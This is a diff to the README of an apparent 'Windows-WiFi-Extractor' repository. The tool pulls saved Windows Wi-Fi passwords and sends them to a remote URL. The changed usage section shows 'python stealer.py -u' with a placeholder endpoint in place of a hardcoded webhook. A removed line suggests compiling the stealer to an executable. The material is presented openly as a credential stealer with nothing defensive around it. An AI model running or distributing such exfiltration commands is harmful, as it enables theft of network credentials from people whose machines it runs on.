dpdug4n/Windows-WiFi-Extractor/README.md

 Extract Windows Wi-Fi Passwords to a Remote URL

 # Usage
-To use, simply replace the `url` variable with your webhook and execute the following:
+Supply your URL after the `-u` arg.
+Set the `-v` arg to print the results.

 ```
-python stealer.py
+python stealer.py -u 'https://your_endpoint.com' -v
 ```

-If you want to be a fancy pants, you can convert this to an exe :)